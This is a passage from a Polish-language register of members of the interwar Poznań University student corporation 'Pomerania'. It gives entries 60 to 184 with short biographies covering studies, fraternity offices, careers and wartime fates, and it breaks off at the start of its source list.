 60. Izydor Janca, (22 maja 1904 w Bobowie w woj. gdańskim - 1940 w Katyniu) s. Izydora i Teofili z Piłatów, brat Bohdana (Codania), absolwent klasycznego w Starogardzie Gdańskim 1922, absolwent Szkoły Podchorążych Rezerwy Piechoty w Śremie 1926/27, student i absolwent med. UP 1927-33, c. 1926/27, akt. 1926/27-30, założyciel (kurator ?) Codanii, w 1933 odbywał praktykę w Toruniu, dr med., ppor. rez. 8 Szpitala Okręgowego, w niewoli sowieckiej, zamordowany przez NKWD
 61. Alfons Jettka, (13 października 1902 w Nowymświecie w pow. Brodnickim - 31 stycznia 1942 w Neuengamme) s. Franciszka i Marii z d. Grabowskiej, uczeń Gimnazjum w Brodnicy, współzałożyciel “Klubu Czerny”, w którym gromadzono broń dla wojska polskiego, ochotnik WP 1920, absolwent Państwowego Gimnazjum Kalsycznego w Toruniu, student i absolwent med. UP 1922-28, akt. 1926-28, II wiceprezes Akademickiego Koła Pomorzan, dr med., po studiach lekarz w Działdowie, lekarz ogólny i ginekolog w Laskowicach 1933-38, a od 1938 w Toruniu działącz społeczny (m.in. członek “Rodziny Kolejowej”, PCK), harcerski i sportowy, aresztowany we wrześniu 1939, w 1940 osadzony w obozie koncentracyjnym w Neuengamme (nr 3124), pełnił funkcję pomocnika lekarskiego, w czasie epiedmii tyfusu plamistego zaraził się niosąc pomoc współwięźniom, w wyniku choroby zmarł [vide szerzej Lesław Welker, Alfons Jettka (1902-1942), maszynopis]
 62. Stanisław Junk, student prawa UP, akt. 1932-33, I wiceprezes czerwiec-październik 1933
 63. Mieczysław Karbowski, prawnik, w 1933 aplikant sądowy w Brodnicy nad Drwęcą
 64. Aleksy Kalisz, student i absolwent Wydziału Humanistycznego UP, akt. 1926-28, sekretarz sem. let. 1926/27, po studiach nauczyciel w gimnazjum
 65. Józef Kilian, ? (20 lutego 1911 w miejsc. Jabłówko - 1940 w Charkowie), s. Władysława, mgr prawa, ppor., w wojnie obronnej 1939 w 64 Pułku Piechoty, w niewoli sowieckiej, zamordowany przez NKWD
 66. Władysław Kilian, ? (1912-1971)
 67. Władysław Kinka, (28 września 1897 w Brusach w pow. chojnickim - ) absolwent Gimnazjum w Chojnicach i w Kwidzynie, student i absolwent (inż. leśnik) Wydziału Rolno-Leśnego UP, w 1933 nadleśniczy w Bartelu Wielkim pow. Kościerzyna
 68. Józef Klebba, student teologii Seminarium Duchownego w Poznaniu, akt. 1926-28, duchowny katolicki, w 1933 ksiądz w Kostrzyniu pow. Środa
 69. Stanisław Klejna, student med. UP, później student wet. 1933, c. 1927/28, akt. 1927/28-33
 70. Jan Klonowski, (1912 - ) brat Edmunda (Masovia), student med. UP, c. 1933 (?), akt. 1933, prezes (?) Koła Medyków
 71. Jerzy Kłosiński, student prawa UP, c. 1926 (?), akt. 1926-28
 72. Feliks Konieczyński, student filozofii UP, c. 1927/28, akt. 1927/28
 73. Marjan Konopiński, student prawa UP, c. 1927/28, akt. 1927/28

  Kazimierz Kopeć, prawd. 1926 r.

 74. Kazimierz Kopeć, (16 stycznia 1906 w Inowrocławiu - 16 września 1989 w Poznaniu) s. Ignacego (kupca) i Józefy z d. Jurkowska, kuzyn Alfonsa i Wiktora Beilów (Pomerania), ukończył 3 klasy szkolne i 4 gimnazjalne w Berlinie, po powrocie rodziny do kraju w 1920 uczęszczał do gimnazjum w Toruniu, a następnie w Brodnicy, gdzie zdał maturę w 1924, student filologii klasycznej Wydziału Humanistycznego UP 1924-28, c. 1924, akt. 1924-28, sekretarz, nauczyciel w Gimnazjum Klasycznym w Wolsztynie 1928-31 oraz w Rogoźnie 1931-32, służba wojskowa w Szkole Podchorążych Artylerii we Włodzimierzu Wołyńskim, ppor. rez., nauczyciel w Miejskim Gimnazjum i Liceum Ogólnokształcącym im. Mikołaja Kopernika w Bydgoszczy, w wojnie obronnej 1939 adiutant dowódcy 4 samodzielnego dywizjonu artylerii ciężkiej w 8 pułku artylerii ciężkiej, przydzielonego do czwartej dywizji Armii Pomorze, brał udział w bitwie pod Bzurą, wzięty do niewoli, osadzony kolejno w obozach Prenzlau, Neubrandenburg, Grossborn, Sandbostel, Lubeka, do czasu wyzwolenia 2 V 1945, w lipcu 1945 współorganizował Polskie Liceum Pedagogiczne i Gimnazjum w Bad Schwartau k. Lubeki, gdzie był m.in. wicedyrektorem, należał do inicjatorów przeniesienia szkoły do Polski, obejmując po jej ulokowaniu w Lubomierzu na Dolnym Śląsku funkcję dyrektora 1946-61, naczelnik Oddziału Kształcenia Nauczycieli w Kuratorium Oświaty i Wychowania we Wrocławiu 1961-1970, lektor, a następnie wykładowca języka łacińskiego w studium Praktycznej Nauki Języków Obcych przy UWr, autor opracowania pt. “Zasady kształcenia nauczycieli na Dolnym Śląsku w latach 1945-69″, odznaczony Srebrnym i Złotym Krzyżem Zasługi, Krzyżem Kawalerskim OOP, Medalem Komisji Edukacji Narodowej, Orderem Sztandaru Pracy II kl (1986), Złotą Odznaką Towarzystwa Szkoły Świeckiej, Medalem za udział w wojnie obronnej 1939, Medalami 10-lecia, 30-lecia i 40 lecia PRL, Złotą Odznaką “Zasłużony dla Dolnego Śląska”, zmarł nagle wychodząc po obejrzeniu sztuki antycznej wystawionej w języku łacińskim na schodach teatru studenckiego w czasie Ogólnopolskiego Zjazdu Filologów Klasycznym w Poznaniu, pochowany we Wrocławiu, upamiętniony nazwą skweru i umieszczonym tam kamieniem-pomnikiem przy Liceum w Lubomierzu [Źródła (poza wskazanymi poniżej spisu członków): córka Teresa Kopeć]

 75. Jan Kostka, (22 czerwca 1902 w miejsc. Garcz k. Kartuz - 22 stycznia 1982 w Nowej Wsi k. Bydgoszczy) s. Marcelego i Marty z d. Gdaniec, brat Leona i Władysława (obaj Pomerania) oraz Wacława (Magna-Polonia), absolwent Gimnazjum Klasycznego w Kościerzynie, student prawa UP, a następnie student i absolwent leśnictwa (inż. leśnik) UP, akt. 1926-28, absolwent Szkoły Podchorążych Rezerwy Piechoty w Śremie, ppor. rez., po studiach pracownik Nadleśnictwa Ruda, Nadleśnictwa Sulęczyn (Giełdoń i Chylonia), w czasie okupacji leśnik w lasach k. Mławy i Działdowa oraz w Dyrekcji Lasów w Radomiu, nadleśniczy w Nadleśnictwie Lipno oraz Nadleśnictwie Skępe, a ostatecznie do emerytury w Nadleśnictwie Czersk 1951-68, pochowany na Cmentarzu Parafialnym w Miłobądzu k. Tczewa [vide szerzej Jerzy A. Kostka, Kostkowie herbu Dąbrowa, Koszalin 2010, s. 186]
 76. Leon Kostka, (30 maja 1900 w Garczu k. Chmielna - 23 stycznia 1950 w Tczewie) s. Marcelego i Marty z d. Gdaniec, brat Jana i Władysława (obaj Pomerania) oraz Wacława (Magna-Polonia), uczeń gimnazjów w Kartuzach, Kościerzynie i Starogardzie Gdańskim, w 1919 ochotnik w armii wielkopolskiej, student i absolwent leśnictwa UP 1919-23, działacz plebiscytowy na Śląsku 1920, po studiach nadleśniczy w Lubichowie pow. Starogard 1923-39 oraz 1945-50, w czasie okupacji od 1940 w administracji leśnej w Generalnej Guberni, po 1945 represjonowany przez UB, pochowany na Cmentarzu w Lubichowie [vide szerzej Jerzy A. Kostka, Kostkowie herbu Dąbrowa, Koszalin 2010, s. 183 i n.]

  Władysław Kostka, 1927/28 r.

 77. Władysław Kostka, (1 listopada 1905 w Garczu k. Kartuz - 19 września 1939 w miejsc. Myszory [lub Famułki Królewskie] w gminie Brochów) s. Marcelego i Marty z d. Gdaniec, brat Jana i Leona (obaj Pomerania) oraz Wacława (Magna-Polonia), uczeń gimnazjów w Kościerzynie i Wejherowie, absolwent Gimnazjum im. Jana Sobieskiego w Wejherowie 1923, po studiach wstąpił do Seminarium Duchownego w Pelplinie, po rezygnacji student i absolwent 1929 prawa UP, c. 1926 (?), akt. 1926-28, wiceprezes r.a. 1927/28, po studiach sędzia w Kartuzach, Kościerzynie, Tczewie, naczelnik Sądu Grodzkiego w Nakle 1937-39, ppor rez. 62 Pułku Piechoty WP, w wojnie obronnej 1939 w Armii “Pomorze”, m.in. uczestnik bitwy nad Bzurą, poległ w trakcie prób wydostania z niemieckiego okrążenia, pochowany w mogile żołnierskiej na Cmentarzu Wojskowym w Janowie, w 1952 prochy zostały przeniesione na Cmentarz Wojskowy w Laskach k. Warszawy [vide szerzej Jerzy A. Kostka, Kostkowie herbu Dąbrowa, Koszalin 2010, s. 187 i n.]

 78. Józef Kozioł Kozioł (od 15 III 1931 Krotoski), (10 stycznia 1906 w Lublinie - ) s. Józefa i Anny Marii z d. Klette, brat bliźniak Witolda (Pomerania), student med. UP, c. 1926/27, akt. 1926/27-30, prezes Związku Akademików Górnoślązaków 1930, w 1931 wraz z bratem zmienił nazwisko na Krotoski

  Źródła (poza wskazanymi poniżej spisu członków): relacja Stanisława Krotoskiego

  Witold Kozioł, 1927/28 r.

 79. Witold Kozioł (od 15 III 1931 Krotoski), (10 stycznia 1906 w Lublinie - 19 listopada 1982 w Głuchołazach) s. Józefa i Anny Marii z d. Klette, brat bliźniak Stanisława (Pomerania), szwagier Jana Kłossoka (Lechia), absolwent Gimnazjum w Rybniku 1925, student i absolwent 1930 prawa UP, c. 1926 (?), akt. 1926-30, sekretarz r.a. 1927/28, wiceprezes r.a. 1929/30, służbę wojskową odbył w Szkole Podchorążych Piechoty w Jarocinie 1930/31, w 1931 wraz z bratem zmienił nazwisko na Krotoski, w 1933 sędzia w Rybniku, od 18 grudnia 1938 kierownik Sądu Grodzkiego w Pszczynie, w czasie II wojny światowej w obozie dla internowanych oficerów polskich w Mosdos na Węgrzech, po wojnie do 1971 kierownik, a następnie prezes Sądu Grodzkiego w Rybniku, pochowany na cmentarzu w Rybniku

  Źródła (poza wskazanymi poniżej spisu członków): relacja Stanisława Krotoskiego

 80. Franciszek Krajnik, akt. 1936-37, wiceprezes sem. let. 1936/37

  Jan Krefft, 1928 r. (?).

 81. Jan Krefft, (ur. w pow. chojnickim - ) student i absolwent 1925 agronomii UP, założyciel Pomeranii, prezes sem. zim. 1924/25, ziemianin, w 1933 w Kosobudach

 82. Alojzy Krukowski, (29 maja 1907 w Lidzbarku - ) student farmacji UP, c. 1926 (?), akt. 1926-33, absolwent farmacji UŁ 1951
 83. Jan Kuczyński, student Wydziału Humanistycznego UP, c. 1926/27, akt. 1926/27-30, w 1933 nauczyciel gimnazjalny w Łodzi
 84. Alojzy Kujawski, student i absolwent filozofii Wydziału Humanistycznego UP, akt. 1926-28, w 1933 nauczyciel gimnazjalny w Poznaniu
 85. Aleksander Kulczyński, akt. 1930, skreślony 1930
 86. Paweł Kustusz, student med. UP, c. 1926 (?), akt. 1926
 87. Jan Kwiatkowski, student ekonomii UP, akt. 1926-28, sekretarz sem. zim. 1926/27, w 1933 w Wejherowie
 88. Alfons Lahn, student i absolwent prawa UP, akt. 1930, w 1933 w Charzykowie pow. Chojnice
 89. Ludwik Lamparski, student Wydziału Humanistycznego UP, c. 1926/27, akt. 1926/27-28, sekretarz r.a. 1929/30, wiceprezes Zjednoczenia Polskich Akademickich Korporacji Chrześcijańskich 1930, w 1933 nauczyciel gimnazjalny w Jarocinie
 90. Florian Lange, student ekonomii UP, akt. 1928, w 1933 urzędnik w Banku Polskim w Lesznie
 91. Teofil Laskowski, student prawa UP, c. 1927/28, akt. 1927/28
 92. Henryk Leciejewski, student prawa UP, akt. 1926-27
 93. Franciszek Lewicki, urzędnik w Banku Polskim w Poznaniu
 94. Henryk Łazarewicz, student filozofii UP, c. 1927/28, akt. 1927/28
 95. Alfons Antoni Maciejewski, (9 maja 1906 w Kowalewie w pow. Wąbrzeźno - ) student i absolwent 1932 med. UP, c. 1926/27, akt. 1926/27-28, dr med. UP, chirurg-ortopeda, w 1956 dyrektor Szpitala im. I. Wierzejewskiego w Poznaniu
 96. Edmund Maćkowiak, student i absolwent prawa UP, c. 1927/28, akt. 1927/28
 97. Franciszek Majewski, (12 stycznia 1902 w Brusach - 2 marca 1984) student i absolwent Wydziału Humanistycznego UP, akt. 1926-28, germanista, po studiach nauczyciel języka niemieckiego w Gimnazjum Zgromadzenia Kupców w Łodzi, później do 1939 dyrektor firmy maklerskiej Juliana Rummla “Rummel & Burton”, pochowany w Gdyni
 98. Kazimierz Majewski, (2 kwietnia 1916 w Nakle nad Notecią - ) lekarz i absolwent 1946 med. UP, internista, w 1956 lekarz w Otwocku
 99. Leon Markowski, student i absolwent prawa UP, akt. 1926-28, w 1933 sędzia w Wejherowie
 100. Alfons Maron, akt. 1930, skreślony 1930, później w sanacyjnej Palestrii
 101. Roman Materny, student i absolwent med. UP, c. 1927/28, akt. 1927/28-30
 102. Jerzy Matuszewski, student i absolwent med. UP, c. 1926/27, akt. 1926/27-28
 103. Zdzisław Mechliński, wystąpił 1930

  Grzegorz Mickholz, 1927/28 r.

 104. Grzegorz Mickholz (Mikholz), ( - 1939 ?) student prawa UP, akt. 1926-28, skarbnik sem. zim. i sem. let. 1926/27, olderman r.a. 1927/28, skarbnik sem. zim. 1928/29, w 1933 sędzia w Grudziądzu, wojnie obronnej 1939 w 8 Dywizji Piechoty w ramach Armii “Modlin”, pochowany na warszawskich Powązkach Wojskowych

 105. Józef Mocny, student Wydziału Humanistycznego UP, c. 1926/27, akt. 1926/27-28, w 1933 nauczyciel gimnazjum w Krasnymstawie

  Mieczysław Mroziński, 1928 r. (?).

 106. Mieczysław Mroziński, student prawa UP, założyciel i pierwszy sekretarz Pomeranii, akt. 1923-27, prezes sem. let. 1923/24 (od maja), olderman, po studiach urzędnik Banku Polskiego w Poznaniu

 107. Konrad Musidłowski, student prawa UP, c. 1933 (?), akt. 1933-36, prezes sem. let. 1935/36
 108. Leonard Nehring, student Wydziału Humanistycznego UP, c. 1926 (?), akt. 1926-28, w 1933 w Czarnkowie
 109. Wojciech Neumann, student Wydziału Humanistycznego UP, akt. 1930-33
 110. Antoni Nowak, student med. UP, akt. 1932-33, olderman r.a. 1932/33 (po Ludwiku Orwacie)
 111. Roman Nowak, (1903? - 1943 w Mauthausen) absolwent Gimnazjum w Chojnicach, student i absolwent 1926 prawa UP, sekretarz, aplikant sądowy, a następnie adwokat w Bydgoszczy, skarbnik Koła Filistrów 1928
 112. Franciszek Nowicki, (2 października 1895 w Salinie w pow. bydgoskim - 1940 w Katyniu), s. Michała i Katarzyny z Wilanów, uczestnik I wojny światowej, student i absolwent 1923 leśnictwa UP, od 1928 kierownik Nadleśnictwa Gniewkowo w pow. morskim, ppor. rez., przydzielony do Pułku Radiotelegraficznego, w niewoli sowieckiej, zamordowany przez NKWD
 113. Marjan Orcholski, student Wydziału Prawno-Ekonomicznego UP, c. 1926/27, akt. 1926/27-28
 114. Maksymilian Orliński, student ekonomii, akt. 1932-33, sekretarz r.a. 1932/33, II wiceprezes czerwiec-październik 1933

  Jan Ornass, 1926/27 r.

 115. Jan Ornass, student i absolwent prawa UP, akt. 1926-28, wiceprezes sem. zim. i sem. let. 1926/27, aplikant sądowy, w 1933 sędzia w Grudziądzu, po wojnie adwokat w Sępólnie Krajeńskim

 116. Ludwik Orwath, student Wydziału Prawno-Ekonomicznego UP, student i absolwent WSHj, c. 1926/27, akt. 1926/27-33, olderman r.a. 1932/33
 117. Alojzy Ossowski, student Wydziału Humanistycznego UP, c. 1933 (?), akt. 1933-36, olderman sem. let. 1935/36
 118. Jan Ossowski, student i absolwent rolnictwa UP, c. 1927/28, akt. 1927/28-31, sekretarz r.a. 1930/31
 119. Eryk Pallasz (Pallasch), ( - 1939-45) student i absolwent prawa UP, akt. 1926-28, w 1933 sędzia w Grudziądzu, zginął w obozie koncentracyjnym
 120. Mieczysław Pasternacki, student i absolwent prawa UP, c. 1927/28, akt. 1927/28-32, prezes r.a. 1931/32, w 1933 w Wielowiczu pow. Sępolno
 121. Aleksander Piernicki, wystąpił 1930
 122. Witold Piotr, student med. UP, akt. 1932-33
 123. Alfred Płaczek, student med. UP, c. 1933 (?), akt. 1933
 124. Franciszek Pokora, student i absolwent med. UP, c. 1926/27, akt. 1926/27-28
 125. Florian Porankiewicz, po wojnie na emigracji w Kanadzie, członek Koła Filistrów Polskich Korporacji Akademickich w Montrealu, prezes 1976
 126. Edmund Prusiewicz, akt. 1936-39, skarbnik sem. let. 1936/37, olderman sem. zim. 1938/39
 127. Roman Pyttlik, student i absolwent prawa UP, akt. 1930-32, prezes r.a. 1931/32 (po Mieczysławie Pasternackim), w 1933 w Chojnicach

  Jan Radtke, 1928 r.

 128. Jan Radtke, student med. UP, c. 1926 (?), akt. 1926-30, sekretarz sem. zim. 1928/29, w 1933 w Chojnicach

 129. Jerzy Radtke, student i absolwent ekonomii UP, w 1933 w Solcu Kujawskim pow. Bydgoszcz
 130. Alfons Radzikowski, c. 1927/28, akt. 1927/28
 131. Roman Teofil Rafiński, (5 marca 1909 w Gostyczynie - 1981) student i absolwent 1934 med. UP, c. 1927/28, akt. 1927/28, dr med. 1938, laryngolog, w 1956 adiunkt w Klinice Chorób Dziecięcych w Poznaniu
 132. Teodor Seweryn Rafiński, (8 listopada 1907 w miejsc. Wilcze w pow. bydgoskim - 1978) student i absolwent 1934 med. UP, c. 1926/27, akt. 1926/27, dr med. 1938, pediatra, habilitacja 1949, w 1956 kierownik Kliniki Chorób Dziecięcych AM w Poznaniu
 133. Alojzy Rediger, ( - ok. 1947 ?) prezes ok. 1925, dr med., w 1933 lekarz w Tczewie, po wojnie lekarz w Wolsztynie

  Bolesław Rediger, 1928 r. (?).

 134. Bolesław Rediger, student Wydziału Humanistycznego UP, akt. 1926-28, prezes sem. let. 1925/26, wiceprezes, przewodniczący Poznańskiej Konferencji Kół Naukowych, członek Poznańskiego Komitetu Akademickiego, kierownik Wydziału Teoretyczno-Naukowego Powszechnej Wystawy Krajowej w Poznaniu

 135. Edwin Richert, (18 grudnia 1906 w Szuwinie w pow. morskim - ) student i absolwent 1938 med. UP, akt. 1932-33, epidemiolog, w 1956 lekarz w Kwidzynie
 136. Alfons Robakiewicz, ( - przed 1939) student Wydziału Humanistycznego UP, akt. 1930-34, prezes sem. let. 1933/34, pochowany na Cmentarzu w Brodnicy
 137. Ludwik Leon Rochon, (21 marca 1908 w Nowym Mieście nad Drwęcą - 1968) student i absolwent 1938 med. UP, chirurg, c. 1926/27, akt. 1926/27-34, II wiceprezes sem. let. 1933/34, w 1956 dyrektor Szpitala Rejonowego w Nakle nad Notecią

  Aleksander Sargalski, druga poł. lat 20-tych.

 138. Aleksander Sargalski, (15 stycznia 1908 w Brodnicy - 1940 w Charkowie), s. Leonarda i Wandy z Dujerków, absolwent Gimnazjum w Brodnicy 1927, student i absolwent Wydziału Prawno-Ekonomicznego UP oraz Konserwatorium Muzycznego w Poznaniu, c. 1926/27, akt. 1926/27-28, w 1933 nauczyciel w Gimnazjum w Brodnicy n. Drwęcą, por. rez., od 1936 kapelmistrz 49 Pułku Piechoty w Kołomyi, aresztowany we wrześniu 1939 w Kołomyi, w niewoli sowieckiej, zamordowany przez NKWD

 139. Eugeniusz Scharf, student Wydziału Humanistycznego UP, c. 1926/27, akt. 1926/27-31, olderman r.a. 1930/31
 140. Antoni Schroeder, c. 1933 (?), akt. 1933
 141. Aleksander Schulz, student med. UP, c. 1926/27, akt. 1926/27-33, sekretarz Akademickiego Koła Pomorzan 1930, wiceprezes Zrzeszenia Akademickiego Kół Prowincjonalnych 1930
 142. Paweł Schulz (po wojnie Szulc), (23 stycznia 1907 w Bytonii - 1986) student i absolwent 1936 med. UP, c. 1927/28, akt. 1927/28-30, sekretarz Poznańskiego Koła Środowiskowego Zjednoczenia Polskich Akademickich Korporacji Chrześcijańskich 1930, dermatolog i wenerolog, po wojnie lekarz w Prudniku
 143. Bronisław Słotwiński, student prawa UP, akt. 1932-33, I wiceprezes r.a. 1932/33
 144. Kazimierz Smoczyński, student prawa UP, c. 1926/27, akt. 1926/27-33, II wiceprezes r.a. 1932/33 (po Franciszku Barganowskim), prawnik, adwokat, członek Zarządu Poznańskiego Koła Środowiskowego Zjednoczenia Polskich Akademickich Korporacji Chrześcijańskich 1930
 145. Wojciech Splonskowski, student med. UP, c. 1926 (?), akt. 1926-33
 146. Wincenty Staniczek, student i absolwent Wydziału Humanistycznego UP, c. 1926/27, akt. 1926/27-28, w 1933 w Pozowie pow. Rybnik
 147. Alfons Staszewski, c. 1933 (?), akt. 1933
 148. Abdon Stryczek, student prawa UP, c. 1926 (?), akt. 1926-27 [być może tożsamy z Abdonem Stryszakiem z K! Cassubia]
 149. Bogdan Szałajda, student Wydziału Humanistycznego UP, c. 1926/27, akt. 1926/27-31, II wiceprezes r.a. 1930/31
 150. Eugeniusz Szarf, student i absolwent Wydziału Humanistycznego UP, c. 1926/27, akt. 1926/27-28, w 1933 w Poznaniu
 151. Wiktor Szews, student leśnictwa UP, c. 1927/28, akt. 1927/28-33
 152. Szlachcikowski, prawnik, adwokat w Kartuzach 1928
 153. Konrad Szukalski, student Wydziału Matematyczno-Przyrodniczego UP, po studiach nauczyciel gimnazjalny w Kościanie

  Maksymilian Szukalski, 1932/33 r.

 154. Maksymilian Szukalski, (2 sierpnia 1912 w Grudziądzu - 28 października 1969) s. Stanisława i Zofii z d. Kędziorska, absolwent gimnazjum w Bydgoszczy 1930, student i absolwent 1934 prawa UP, akt. 1932-33, prezes r.a. 1932/33, 1933/34 magister cantandi, od śmierci ojca w 1932 do nacjonalizacji w 1950 prowadził skład nasion przy ul. Dworcowej 95a w Bydgoszczy, w czasie okupacji w Warszawie i Podkowie Leśnej, więziony na Pawiaku, od 1957 do śmierci prowadził prywatny zakład szklarski

 155. Edmund Szwacki, student prawa UP, c. 1933 (?), akt. 1933
 156. Franciszek Szwarc, student Wydziału Humanistycznego UP, akt. 1926-27, sekretarz i wiceprezes
 157. Kazimierz Szwarc, student filozofii UP, akt. 1928, w 1933 urzędnik w K.K.O. Miasta Poznania

  Franciszek Szwedowski, 1926/27 r.

 158. Franciszek Szwedowski, ( - 1986/87 w Warszawie) student prawa UP, student i absolwent filozofii UP, akt. 1926-30, sekretarz i wiceprezes, w 1933 w Zblewie pow. Starogard

 159. Zenon Szymański, student med. UP, c. 1927/28, akt. 1927/28
 160. Bolesław Torliński, (1914 - 1939 w Babich Dołach) akt. 1938-39, prezes sem. zim. 1938/39, zmarł z ran odniesionych w obronie Wybrzeża w szpitalu w Babich Dolach, pochowany w Swarzewie
 161. Jan Trafalski, prawnik, w 1933 adwokat w Gnieźnie

  Aleksander Trawicki, 1939 r.

 162. Aleksander Trawicki, (7 lutego 1907 w Nakle k. Bytowa - 1981) student i absolwent 1933 med. UP, c. 1926 (?), akt. 1926-28, w 1956 kierownik Przychodni Rejonowej w Kościerzynie

 163. Tadeusz Wachowiak, akt. 1935-36, wiceprezes sem. let. 1935/36

  Alfons Wandtke, 1928 r. (?).

 164. Alfons Wandtke, (28 stycznia 1904 - 13 września 1939 w Cegłowie k. Mińska Mazowieckiego) s. Augustyna i Agaty z d. Błaszkowska,uczeń Gimnazjum Diecezjalnego w Pelpinie, a następnie uczeń i absolwent gimnazjum w Wejherowie, student i absolwent prawa UP, akt. 1925-28, prezes sem. zim. 1925/26, wiceprezes, aplikant sądowy, w 1933 podprokurator w Chojnicach, a następnie prokurator w Grudziądzu, ppor. rez., w wojnie obronnej 1939 walczył w 105 pułku piechoty w 103 batalionie strzelców, pochowany w mogile żołnierskiej pod Cyganką

 165. Bernard Wangler, ( - 3 października 1933) student i absolwent prawa UP, akt. 1926-28, olderman, wiceprezes, sędzia Sądu Grodzkiego w Starogardzie
 166. Józef Wangler, studnet med. UP, akt. 1932-33, sekretarz czerwiec-październik 1933, I wiceprezes sem. let. 1933/34
 167. Józef Wenda, student Wydziału Humanistycznego UP, akt. 1926-28, w 1933 nauczyciel gimnazjalny w Bydgoszczy
 168. Szymon Wiese, student teologii UP, akt. 1932-33
 169. Józef Willma (Wilma), student prawa UP, c. 1933 (?), akt. 1933-37, skarbnik sem. let. 1935/36, prezes sem. let. 1936/37
 170. Ludwik Wiśniewski, student Wydziału Prawno-Ekonomicznego UP, c. 1926/27, akt. 1926/27-28
 171. Zygmunt Wiśniewski, (ur. w Toruniu - ) absolwent Gimnazjum w Toruniu, student i absolwent 1926 prawa UP, wiceprezes, aplikant sądowy, a w 1933 adwokat w Toruniu
 172. Piotr Witold, akt. 1930
 173. Leon Franciszek Witkowski, (13 grudnia 1908 w Sławkowie w pow. Toruńskim - 1992) s. Jana i Marty z Ziółkowskich, absolwent Gimnazjum Klasycznego i Humanistycznego w Toruniu 1927, student i absolwent Wydziału Humanistycznego UP 1927-33, filolog klasyczny i muzykolog, absolwent Wyższego Studium Dziennikarskiego w WSH w Poznaniu 1934, wykładowca w gimnazjach w Koninie, Brodnicy, Toruniu, w czasie wojny nauczyciel języka niemieckiego w Łódzkim, prowadził także tajne nauczanie gimnazjalne, po wojnie prof. literatury klasycznej w żeńskim Gimnazjum im. Królowej Jadwigi, asystent przy Katedrze Filologii Klasycznej UMK, dr filologii klasycznej i muzykologii UP 1947, habilitacja UW, doc. w Katedrze Filologii Klasycznej UMK, działacz społeczny, m.in. pierwszy prezes oddziału toruńskiego Zrzeszenia Kaszubsko-Pomorskiego, wiceprezes Towarzystwa Bibliofilów im. Joachima Lelewela, członek licznych towarzystw kulturalnych, artystycznych, muzycznych i naukowych, odznaczony m.in. Krzyżem Kawalerskim OOP, Złotym Krzyżem Zasługi, pochowany na Cmentarzu Staromiejskim św. Jerzego w Toruniu
 174. Stefan Hilary Wittke, (13 stycznia 1909 w miejsc. Pobłocie w pow. wejherowskim - 8 lutego 1978) z rodziny ziemiańskiej, s. Antoniego i Pelagii z d. Zakrzewska, brat Kazimierza (Cassubia), absolwent Gimnazjum w Wejherowie, student i absolwent 1933 med. UP, c. 1926/27, akt. 1926/27-28, dr med. UP 1938, ginekolog, ppor. rez., w wojnie obronnej 1939 w obronie Wybrzeża, w niewoli niemieckiej w Oflagu X w Itzehoe k. Kilonii 1939-45, po wojnie ordynator Oddziału Położniczego Szpitala w Wejherowie, po zalegalizowaniu aborcji zrezygnował z tej funkcji i objął obowiązki ordynatora Oddziału Zakaźnego, aktywny członek Zrzeszenia Kaszubsko-Pomorskiego, m.in. założyciel oddziału w Wejherowie, pochowany w Wejherowie (vide szerzej: Jerzy Kostka, Ród Wittke, Koszalin 1995, s. 10)

  Jan Wojczyński, 1927/28 r.

 175. Jan Wojczyński, student med. UP, c. 1926 (?), akt. 1926-28, sekretarz r.a. 1927/28, członek Zarządu Poznańskiego Koła Środowiskowego Zjednoczenia Polskich Akademickich Korporacji Chrześcijańskich 1930

 176. Paweł Wojewski, ( - 1939-45) student i absolwent prawa UP, c. 1926/27, akt. 1926/27-30, w 1933 w Gościcinie w pow. morskim, zginął w czasie wojny w obozie
 177. Feliks Wojtaś, student Wydziału Humanistycznego UP, akt. 1932-33, olderman czerwiec-październik 1933
 178. Aleksander Wysiński , (10 grudnia 1897 w Brusach w pow. chojnickim - 1951) s. Mieczysława, brat Józefa (Pomerania), uczeń gimnazjów w Pelplinie i Chojnicach, student i absolwent 1925 (inż. leśnik) Wydziału Rolno-Leśnego UP, założyciel i pierwszy wiceprezes Pomeranii, po studiach urzędnik Dyrekcji Lasów Państwowych w Bydgoszczy, a następnie nadleśniczy w Wierzchlesie pow. Tuchola, sekretarz Koła Filistrów 1928-33

  Alfons Wysocki, 1926/27 r.

 179. Alfons Wysocki, (4 czerwca 1904 w Brusach w pow. chojnickim - ) student i absolwent Wydziału Humanistycznego UP, c. 1926 (?), akt. 1926-28, filolog języków nowożytnych, w 1933 nauczyciel gimnazjalny w Smorgoniu w woj. wileńskim

  Dominik Wysocki, 1928 r.

 180. Dominik Wysocki, student Wydziału Humanistycznego UP, c. 1926 (?), akt. 1926-30, wiceprezes sem. zim. 1928/29, prezes r.a. 1929/30, wiceprezes Akademickiego Koła Pomorskiego 1928, w 1933 nauczyciel gimnazjalny w Nakle nad Notecią

 181. Brunon Ziemek, student prawa UP, założyciel Pomeranii, akt. 1923-27, urzędnik Banku Polskiego w Poznaniu

  Stefan Bach-Żelewski, 1928 r.

 182. Stefan Józef Bach-Żelewski, (18 lipca 1909 w Wejherowie - 10 grudnia 1988 w Poznaniu) s. Jana Ksawerego i Anielii Marii z d. Plichta, absolwent Gimnazjum Staroklasycznego w Wejherowie 1926, student i absolwent 1935 med. UP, c. 1926, akt. 1926-31, olderman sem. zim. 1928/29, olderman r.a. 1929/30, prezes 1931, sekretarz Zjednoczenia Polskich Akademickich Korporacji Chrześcijańskich 1930, po studiach lekarz w Poznaniu i Tczewie, specjalizował się w zakresie stomatologii i chirurgii, w czasie okupacji stomatolog krakowskiej Ubezpieczalni Społecznej w Myślenicach 1940-45, po wojnie prowadził prywatną praktykę w Ostrowie Wielkopolskim 1945 i Bydgoszczy 1945-46, a w latach 1952-59 w Poznaniu, jednocześnie pracował między innymi w Szpitalu Wojskowym Urzędu Bezpieczeństwa Publicznego w Bydgoszczy 1945-52, Przychodni Lekarskiej Izby Rzemieślniczej w Poznaniu 1952-59, Zespole Opieki Zdrowotnej Poznań Jeżyce 1959-71 oraz Zespole Opieki Zdrowotnej Poznań-Grunwald 1971-78, pochowany na Cmentarzu Komunalnym na Junikowie w Poznaniu

 183. Waldemar Żużak, student i absolwent prawa UP, akt. 1930, w 1933 aplikant sądowy w Brodnicy nad Drwęcą
 184. Józef Żynda, (27 września 1907 w Kościerzynie - wrzesień 1939 nad Bzurą) student i absolwent med. UP, c. 1926 (?), akt. 1926-30, zginął w czasie bitwy nad Bzurą

Pieczęć Pomeranii, 1933 r.

Listę członków opracowano na podstawie:

1) Roczniki Korporacji Studentów Uniwersytetu Poznańskiego “Pomerania”, t. 1-3, Poznań 1926-28,
